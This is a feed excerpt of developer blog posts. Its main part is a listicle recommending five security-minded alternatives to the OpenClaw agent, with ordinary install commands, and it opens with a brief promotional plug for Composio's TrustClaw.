&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkw7pva65r9ghx9vngi1g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkw7pva65r9ghx9vngi1g.png" alt="Composio Integrations" width="800" height="420"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;All the integrations you use are OAuth hosted, and only the tools you connect will be available to OpenClaw. Nothing more than that.&lt;/p&gt;




&lt;h2&gt;
  
  
  Wrap Up!
&lt;/h2&gt;

&lt;p&gt;OpenClaw is really useful for some people (not everyone), but it’s also risky. It can touch your files, run commands, and pull in third party skills, which can &lt;strong&gt;include malware&lt;/strong&gt;, like we discussed. It’s a local agent gateway with everything: your filesystem, your shell, and whatever credentials you put into it. That power is the whole point, and it’s also the danger.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhnhhnc4jpxr7gwxosedq.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhnhhnc4jpxr7gwxosedq.gif" alt="With great power comes great responsibility GIF" width="480" height="256"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So if you’re going to use it, seriously consider &lt;strong&gt;OAuth-hosted safe integrations&lt;/strong&gt; instead of pasting API keys everywhere. It’s an easy way to reduce the chance of a disaster.&lt;/p&gt;

&lt;p&gt;And, if you're looking for some secure alternatives, find it here: &lt;a href="https://composio.dev/blog/openclaw-alternatives" rel="noopener noreferrer"&gt;Top 5 Secure OpenClaw Alternatives&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;That’s it for this post. Hope it helped, and I’ll see you next time. ✌️&lt;/p&gt;

</description>
      <category>ai</category>
      <category>productivity</category>
      <category>tutorial</category>
      <category>opensource</category>
    </item>
    <item>
      <title>🖐️Top 5 secure OpenClaw Alternatives you should consider 👀</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Tue, 17 Feb 2026 12:59:41 +0000</pubDate>
      <link>https://forem.com/composiodev/top-5-secure-openclaw-alternatives-you-should-consider-172p</link>
      <guid>https://forem.com/composiodev/top-5-secure-openclaw-alternatives-you-should-consider-172p</guid>
      <description>&lt;p&gt;OpenClaw is everywhere right now, and I get the hype. I’ve been seeing it all over my feed lately, and it’s clearly clicking with a lot of people. 👌&lt;/p&gt;

&lt;p&gt;After using it for quite some time myself, it feels a bit too noisy, and not every tool works the same way for every person.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7j8wyae4kp66m1etga3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7j8wyae4kp66m1etga3.png" alt="OpenClaw tweets"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Whenever something starts trending this hard, it’s a good excuse to look around, especially if you’re after something more minimal.&lt;/p&gt;

&lt;p&gt;And now, OpenClaw may have its 4th rename to be &lt;strong&gt;Closed&lt;/strong&gt;Claw very soon. 🤷‍♂️ You never know with OpenAI.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu5w8ex4icind6gwy2ph.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcu5w8ex4icind6gwy2ph.png" alt="OpenClaw joining OpenAI tweet"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Why OpenClaw alternatives?
&lt;/h2&gt;

&lt;p&gt;OpenClaw is super powerful, no doubt, but it comes with two big headaches, and you probably have already felt them yourself.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Security&lt;/li&gt;
&lt;li&gt;Setup Friction&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When your agent can read files, run shell commands, and pull in third-party “skills,” you are basically giving it the keys to your machine. The skill marketplace has already turned into a real problem, with researchers finding &lt;strong&gt;hundreds of malicious skills&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;If you are not auditing everything you install, it is easy to get yourself cooked.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F170ua87mrfkafsw3pmx7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F170ua87mrfkafsw3pmx7.png" alt="OpenClaw marketplace found to have malwares"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Setup Friction&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The “self-host it and wire up” path is fun if you like tinkering, but it is also where most people get stuck. You end up handling gateways, background services, tokens, and permission issues (most of the time).&lt;/p&gt;

&lt;p&gt;And it's not that you're probably going to use all the features that come with the bloated app, just a few, for most people, so alternatives often could be a good choice.&lt;/p&gt;

&lt;p&gt;Below are five OpenClaw alternatives that can cover the same ground, often with a smoother and more minimal experience, depending on what you’re building.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. &lt;a href="https://www.trustclaw.app/" rel="noopener noreferrer"&gt;TrustClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Rebuilt from scratch on OpenClaw's idea with &lt;strong&gt;1000+ tools&lt;/strong&gt;, with a focus on security.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygoq325t5h7exrxk46y4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fygoq325t5h7exrxk46y4.png" alt="TrustClaw by Composio"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;TrustClaw is for those who like the idea of OpenClaw but don't want to hand over their passwords to the agent and run it locally.&lt;/p&gt;

&lt;p&gt;It's built by the &lt;strong&gt;Composio team&lt;/strong&gt;, and the pitch is basically: you get an agent that is available 24/7, capable of taking real actions across a vast number (500+) of apps, but the risky parts like credentials and code execution are handled in a more controlled way.&lt;/p&gt;

&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;OAuth-only auth:&lt;/strong&gt; You connect apps the normal way (OAuth), so you are not pasting API keys or passwords into config files.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sandboxed execution by default:&lt;/strong&gt; Every action runs in an isolated cloud environment that disappears when the task finishes. So you are not running “agent code” locally with your permissions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed tool surface:&lt;/strong&gt; Instead of pulling random community “skills” from a public registry, TrustClaw uses Composio’s managed integrations and tooling.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Audit trails + kill switch:&lt;/strong&gt; It keeps a full action log, and you can revoke access with one click if you ever need to.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The last point is important because agent toolchains are a real security risk right now. These marketplaces, with just one random add-on, can trick you into running malware. This has already happened in the past. Ref: &lt;a href="https://www.theverge.com/news/874011/openclaw-ai-skill-clawhub-extensions-security-nightmare" rel="noopener noreferrer"&gt;OpenClaw’s AI ‘skill’ extensions are a security nightmare&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The kind of prompts it’s built for
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;“Handle my customer complaints and log in Notion”&lt;/p&gt;

&lt;p&gt;It finds the right tools, fetches emails, creates drafts, and writes Notion pages (using tools such as: &lt;code&gt;GMAIL_FETCH_EMAILS&lt;/code&gt;, &lt;code&gt;GMAIL_CREATE_DRAFT&lt;/code&gt;, &lt;code&gt;NOTION_CREATE_PAGE&lt;/code&gt;).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;“Pull all Reddit threads mentioning [competitor] from the last 3 months, analyze sentiment...”&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;“Summarize all Slack messages in #product-feedback from this week...”&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why it’s comparatively better (for most of you)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Setup in seconds&lt;/strong&gt; (vs. 30 to 60 minutes of tunnels and local setup)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encrypted credentials&lt;/strong&gt; managed by Composio (vs. plaintext local config)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Remote sandbox&lt;/strong&gt; (vs. local machine execution)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Managed tool surface&lt;/strong&gt; (vs. unvetted public skill registry)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Action logs + one-click revocation&lt;/strong&gt; (vs. digging through config files)&lt;/li&gt;
&lt;li&gt;and no need for &lt;strong&gt;Mac Mini&lt;/strong&gt; 🤷‍♂️&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Go to TrustClaw and hit &lt;a href="https://www.trustclaw.app/login" rel="noopener noreferrer"&gt;Get Started&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Connect the apps you want (OAuth flow).&lt;/li&gt;
&lt;li&gt;Give it a task in plain language, or schedule one to run while you are offline.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's a demo: 👇&lt;/p&gt;

&lt;p&gt;

&lt;iframe class="tweet-embed" id="tweet-2022518658048888916-653" src="https://platform.twitter.com/embed/Tweet.html?id=2022518658048888916"&gt;
&lt;/iframe&gt;

  // Detect dark theme
  var iframe = document.getElementById('tweet-2022518658048888916-653');
  if (document.body.className.includes('dark-theme')) {
    iframe.src = "https://platform.twitter.com/embed/Tweet.html?id=2022518658048888916&amp;amp;theme=dark"
  }





&lt;/p&gt;

&lt;p&gt;It's that simple, so now you have OpenClaw that runs completely in the cloud with managed permissions and the tools you require.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. &lt;a href="https://zeroclaw.org/" rel="noopener noreferrer"&gt;ZeroClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Written in Rust, it runs even on $10 hardware with &amp;lt;5MB RAM.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F576jdieqv0887vp0iv2r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F576jdieqv0887vp0iv2r.png" alt="ZeroClaw - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;ZeroClaw keeps the agent stack lean. Instead of a big local setup with lots of moving parts, you get a lightweight Rust binary that starts fast and runs comfortably on cheap hardware. If you care more about speed, stability, and low resource use, this one hits the sweet spot.&lt;/p&gt;

&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Ultra lightweight:&lt;/strong&gt; designed to keep CPU and RAM usage low.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Quick boot:&lt;/strong&gt; fast startup, good for bots and always-on tasks.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Modular:&lt;/strong&gt; swap models, memory, tools, and channels without rewriting everything.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Why pick it over OpenClaw?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;You want something minimal and predictable.&lt;/li&gt;
&lt;li&gt;You’re running on a small VPS / Raspberry Pi / home lab.&lt;/li&gt;
&lt;li&gt;You don’t need a huge plugin marketplace, you need a tool that just runs.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/zeroclaw-labs/zeroclaw.git
&lt;span class="nb"&gt;cd &lt;/span&gt;zeroclaw
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt;
cargo &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;--path&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt; &lt;span class="nt"&gt;--force&lt;/span&gt;

&lt;span class="c"&gt;# quick setup with openrouter&lt;/span&gt;
zeroclaw onboard &lt;span class="nt"&gt;--api-key&lt;/span&gt; sk-... &lt;span class="nt"&gt;--provider&lt;/span&gt; openrouter

&lt;span class="c"&gt;# chat&lt;/span&gt;
zeroclaw agent &lt;span class="nt"&gt;-m&lt;/span&gt; &lt;span class="s2"&gt;"Hello, ZeroClaw!"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h2&gt;
  
  
  3. &lt;a href="https://github.com/qwibitai/nanoclaw" rel="noopener noreferrer"&gt;NanoClaw&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ OpenClaw's alternative that runs entirely in a container for security.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ddtqk8ramy5wd0zd0si.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0ddtqk8ramy5wd0zd0si.png" alt="NanoClaw - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;NanoClaw is basically the same thing but runs completely isolated inside a Docker container. The whole idea is simple: keep the codebase small, and put the risky stuff (bash, file access, tools) inside an isolated container so it can only touch what you explicitly mount.&lt;/p&gt;

&lt;p&gt;That's pretty much the idea of NanoClaw.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Container isolation by default:&lt;/strong&gt; runs in Apple Container (macOS) or Docker (macOS/Linux), with filesystem isolation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Per-chat sandboxing:&lt;/strong&gt; each group/chat can have its own memory and its own mounted filesystem, separated from others.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Built on Anthropic’s Agents SDK:&lt;/strong&gt; it’s basically designed to work nicely with Claude’s agent tooling and Claude Code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;WhatsApp + scheduled jobs:&lt;/strong&gt; message it from your phone, and set recurring tasks that ping you back.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/gavrielc/nanoclaw.git
&lt;span class="nb"&gt;cd &lt;/span&gt;nanoclaw
claude
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Then run &lt;code&gt;/setup&lt;/code&gt;. Claude Code handles everything: dependencies, authentication, container setup, and service configuration.&lt;/p&gt;

&lt;p&gt;Here's a quick demo: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/AQ5uiLyr8bQ"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;
&lt;h2&gt;
  
  
  4. &lt;a href="https://github.com/HKUDS/nanobot" rel="noopener noreferrer"&gt;nanobot&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Ultra lightweight AI assistant built with Python.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6pidyqqtzljh9u1j5fx3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6pidyqqtzljh9u1j5fx3.png" alt="nanobot - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Nanobot, as the name suggests, is quite small. The core agent is about ~4,000 lines of code, and the repo even publishes a live count you can verify with their script. That is the whole vibe: small enough that you can actually read it, trust it, and change it.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Core size metric:&lt;/strong&gt; ~4,000 LOC, with a “real-time” line count shown in the README (and a script to verify).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MCP support (fresh):&lt;/strong&gt; added 2026-02-14, so it can plug into MCP tool servers without you reinventing the plumbing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runs where you already are:&lt;/strong&gt; built-in “gateway” mode supports a bunch of chat surfaces like Telegram, Discord, WhatsApp, Slack, Email, and more.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Quick Start
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;pip &lt;span class="nb"&gt;install &lt;/span&gt;nanobot-ai

nanobot onboard
nanobot agent          &lt;span class="c"&gt;# local interactive chat&lt;/span&gt;
nanobot gateway        &lt;span class="c"&gt;# run it as a chat bot (Telegram, Discord, WhatsApp, etc)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Here's a quick architecture:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqmi9wen3bpya82ck9gyz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqmi9wen3bpya82ck9gyz.png" alt="nanobot architecture"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's a video to give you an idea of how it works: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/18WGbR6GYn0"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;
&lt;h2&gt;
  
  
  5. &lt;a href="https://memu.bot/" rel="noopener noreferrer"&gt;memU Bot&lt;/a&gt;
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;ℹ️ Built for 24/7 proactive agents designed for long-running use.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kh9ebx6inxnrato08td.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9kh9ebx6inxnrato08td.png" alt="memU bot - OpenClaw alternative"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;memU Bot is built for people who want an agent that keeps running and becomes more useful over time, instead of resetting to zero every time you open a new chat.&lt;/p&gt;

&lt;p&gt;The site definitely looks like it was coded by a 12-year-old 😭, but don’t let that scare you off, because the product underneath is really good.&lt;/p&gt;

&lt;p&gt;Under the hood, it’s tied to &lt;strong&gt;memU&lt;/strong&gt;, NevaMind’s memory framework for long-running proactive agents, with a focus on reducing long-run context cost by caching insights.&lt;/p&gt;
&lt;h3&gt;
  
  
  What makes it different?
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Always-on + proactive:&lt;/strong&gt; it’s designed to sit in the background and capture intent (not just respond to prompts).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory system that scales:&lt;/strong&gt; memU treats memory like a file system (categories, memory items, cross-links), so the agent can fetch relevant fragments instead of shoving the whole history into every request.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Quick start
&lt;/h3&gt;

&lt;p&gt;It's a bit more involved than other options.&lt;/p&gt;

&lt;p&gt;If you just want the product (memU Bot):&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Go to &lt;a href="http://memu.bot/" rel="noopener noreferrer"&gt;memu.bot&lt;/a&gt;, enter your email, and get the download link they send you.&lt;/li&gt;
&lt;li&gt;Install it like a normal desktop app (they provide a macOS .dmg in the tutorial flow).&lt;/li&gt;
&lt;li&gt;Start it, connect the channel you want (Telegram, etc.), and let it run so it can build memory over time.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;git clone https://github.com/NevaMind-AI/memU.git
&lt;span class="nb"&gt;cd &lt;/span&gt;memU

&lt;span class="c"&gt;# Requires Python 3.13+&lt;/span&gt;
pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nb"&gt;.&lt;/span&gt;

&lt;span class="c"&gt;# set your key (OpenAI is the default in their quick tests)&lt;/span&gt;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your_api_key"&lt;/span&gt;

&lt;span class="c"&gt;# quick test using in-memory storage&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
python test_inmemory.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Want persistent memory backed by Postgres + pgvector?&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;docker run &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--name&lt;/span&gt; memu-postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_USER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;postgres &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="nv"&gt;POSTGRES_DB&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;memu &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt; 5432:5432 &lt;span class="se"&gt;\&lt;/span&gt;
  pgvector/pgvector:pg16

&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;OPENAI_API_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your_api_key"&lt;/span&gt;
&lt;span class="nb"&gt;cd &lt;/span&gt;tests
python test_postgres.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;They also provide a small runnable "proactive loop" example if you want to see the behavior without going through tests:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;examples/proactive
python proactive.py
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;There's also a &lt;a href="https://github.com/NevaMind-AI/memU/blob/main/README.md#option-1-cloud-version" rel="noopener noreferrer"&gt;Cloud version&lt;/a&gt; which you can try out as well.&lt;/p&gt;

&lt;p&gt;It might be worth checking this out: 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/M9ShNSaP8b8"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;



&lt;blockquote&gt;
&lt;p&gt;If you know of any other useful OpenClaw alternative tools that I haven't mentioned in this article, please share them in the comments section below. 👇🏻&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That concludes this article. Thank you so much for reading! 🫡&lt;/p&gt;

&lt;p&gt;

&lt;/p&gt;
&lt;div class="ltag__user ltag__user__id__1127015"&gt;
    &lt;a href="/shricodev" class="ltag__user__link profile-image-link"&gt;
      &lt;div class="ltag__user__pic"&gt;
        &lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1127015%2F1c5e48a2-f602-4e7d-8312-3c0322d155c6.jpg" alt="shricodev image"&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;div class="ltag__user__content"&gt;
    &lt;h2&gt;
&lt;a class="ltag__user__link" href="/shricodev"&gt;Shrijal Acharya&lt;/a&gt;Follow
&lt;/h2&gt;
    &lt;div class="ltag__user__summary"&gt;
      &lt;a class="ltag__user__link" href="/shricodev"&gt;Full Stack SDE • Open-Source Contributor • Collaborator @Oppia • Mail for collaboration&lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
&lt;/div&gt;





</description>
      <category>ai</category>
      <category>productivity</category>
      <category>opensource</category>
      <category>security</category>
    </item>
    <item>
      <title>🔥 Claude Opus 4.5 vs GPT 5.2 High vs Gemini 3 Pro: Production Coding Test ✅</title>
      <dc:creator>Shrijal Acharya</dc:creator>
      <pubDate>Sun, 18 Jan 2026 12:41:12 +0000</pubDate>
      <link>https://forem.com/tensorlake/claude-opus-45-vs-gpt-52-high-vs-gemini-3-pro-production-coding-test-25of</link>
      <guid>https://forem.com/tensorlake/claude-opus-45-vs-gpt-52-high-vs-gemini-3-pro-production-coding-test-25of</guid>
      <description>&lt;p&gt;Okay, so right now the &lt;strong&gt;WebDev&lt;/strong&gt; leaderboard on LMArena is basically owned by the big three: Claude Opus 4.5 from &lt;strong&gt;Anthropic&lt;/strong&gt;, GPT-5.2-codex (high) from &lt;strong&gt;OpenAI&lt;/strong&gt;, and finally everybody's favorite, Gemini 3 Pro from &lt;strong&gt;Google&lt;/strong&gt;.&lt;/p&gt;

